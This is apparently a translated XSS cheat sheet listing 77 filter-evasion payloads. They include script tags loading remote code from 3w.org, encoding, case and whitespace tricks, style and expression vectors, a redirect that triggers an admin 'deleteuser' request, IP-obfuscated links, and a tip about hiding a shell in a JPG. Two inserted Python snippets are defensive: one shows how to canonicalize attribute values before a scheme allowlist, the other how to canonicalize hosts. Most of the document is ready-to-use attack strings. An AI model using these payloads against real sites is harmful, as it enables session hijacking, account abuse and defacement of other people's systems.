Cross-site image shell
XSS cross-site code: <script>alert("")</script>

Add the code to the first line of the shell, then change the shell into JPG image format; when the JPG-format shell is accessed, our shell is executed as well.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective domestically, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
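
Items 3 to 19 all defeat the same weak defense: a literal check for the string "javascript:" in an attribute value. The Python below is an added example (not part of the original post) of the defensive alternative: canonicalize the value the way a browser does (decode HTML entities, drop NUL, tab, LF and CR, strip leading controls and spaces) and then accept only an explicit list of schemes. The sample values, the SAFE_SCHEMES set and the function names are constructed for this example.

```python
import html
import re
from urllib.parse import urlsplit

# Schemes an application should accept in SRC/HREF attributes; "" means a
# relative URL. Anything else (javascript:, vbscript:, data:, ...) is refused.
SAFE_SCHEMES = {"http", "https", ""}

# Browsers delete ASCII tab, LF and CR anywhere in a URL and strip leading and
# trailing C0 controls and spaces before looking at the scheme (WHATWG URL
# parsing), which is why "jav<TAB>ascript:" and " javascript:" still run.
_TAB_LF_CR = re.compile(r"[\t\n\r]")
_C0_AND_SPACE = "".join(chr(c) for c in range(0x21))

def canonical_scheme(attr_value: str) -> str:
    """Lower-cased scheme a browser would see for an attribute value."""
    text = html.unescape(attr_value)      # items 5, 8-10: &#106; / &#x6A / &#106 -> 'j'
    text = text.replace("\x00", "")       # items 17, 18: embedded NUL
    text = _TAB_LF_CR.sub("", text)       # items 11-14: embedded tab / newline / CR
    text = text.strip(_C0_AND_SPACE)      # item 19: leading spaces and controls
    return urlsplit(text).scheme.lower()  # also folds case (item 4)

def naive_prefix_check_allows(attr_value: str) -> bool:
    """The filter these payloads evade: a literal, case-sensitive prefix test."""
    return not attr_value.startswith("javascript:")

def allowlist_allows(attr_value: str) -> bool:
    """Canonicalize first, then accept only known-safe schemes."""
    return canonical_scheme(attr_value) in SAFE_SCHEMES

# Constructed samples using the same tricks as items 4-19 above.
SAMPLES = [
    "JaVaScRiPt:alert('XSS')",       # item 4: mixed case
    "jav\tascript:alert('XSS')",     # item 11: embedded tab
    "jav\nascript:alert('XSS')",     # item 13: embedded newline
    "&#106;avascript:alert('XSS')",  # item 5: HTML-encoded first letter
    "java\x00script:alert('XSS')",   # item 17: embedded NUL
    "  javascript:alert('XSS')",     # item 19: leading spaces
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r:36} prefix check: {naive_prefix_check_allows(s)}  "
              f"allowlist: {allowlist_allows(s)}")
```

Every sample passes the prefix check and is refused by the allowlist, because the allowlist decides on what the browser will parse rather than on the raw bytes.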

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag, part 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters prepended (character codes 1-32, 34, 39, 160, 8192-8, 13, 12288, 65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (formed from an opening angle bracket and a leading letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE approach
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed Flash that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) ActionScript inside Flash can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command, which can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
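
Items 70 to 76 show host spellings that a browser resolves but a string-based URL allow list or deny list does not recognise as the same destination. The Python below is an added example (not from the original post) of canonicalizing the host before any such comparison: it deletes the tab and newline bytes of item 73, decodes inet_aton-style numeric hosts (decimal, hex, octal, fewer than four parts) to dotted decimal, and drops the trailing dot of item 76. The sample URLs and function names are constructed for this example.

```python
import ipaddress
import re
from typing import Optional
from urllib.parse import urlsplit

_TAB_LF_CR = re.compile(r"[\t\n\r]")  # deleted by browsers before URL parsing (item 73)

def _numeric_part(part: str) -> int:
    """One dotted-host component as inet_aton reads it: 0x hex, leading-0 octal, else decimal."""
    if part[:2].lower() == "0x":
        return int(part[2:] or "0", 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)

def canonical_ipv4(host: str) -> Optional[str]:
    """Dotted-decimal form of an inet_aton-style numeric host, or None if it is not one."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(parts):
        return None
    try:
        *head, last = [_numeric_part(p) for p in parts]
    except ValueError:
        return None
    # With fewer than four parts the last number fills every remaining byte,
    # so "127.1" is 127.0.0.1 and a lone number is the whole 32-bit address.
    if any(n > 255 for n in head) or last >= 256 ** (4 - len(head)):
        return None
    value = last
    for shift, n in enumerate(reversed(head), start=4 - len(head)):
        value |= n << (8 * shift)
    return str(ipaddress.IPv4Address(value))

def canonical_host(url: str) -> Optional[str]:
    """Host as the browser resolves it: numeric forms decoded, trailing dot dropped."""
    host = urlsplit(_TAB_LF_CR.sub("", url)).hostname  # hostname is already lower-cased
    if not host:
        return None
    return canonical_ipv4(host) or host.rstrip(".")

# Constructed samples mirroring items 70-76; item 73 uses real tab and newline bytes.
SAMPLES = {
    "http://3232235521/": "192.168.0.1",                # item 70: decimal
    "http://0xc0.0xa8.0x00.0x01/": "192.168.0.1",       # item 71: hex
    "http://0300.0250.0000.0001/": "192.168.0.1",       # item 72: octal
    "h\ntt\tp://6\t6.000146.0x7.147/": "66.102.7.147",  # item 73: mixed
    "http://www.google.com./": "www.google.com",        # item 76: trailing dot
}
```

Compare canonical_host() output, not the raw href, against any host allow list or deny list.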

(74) Dropping [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Dropping [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot / absolute DNS
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>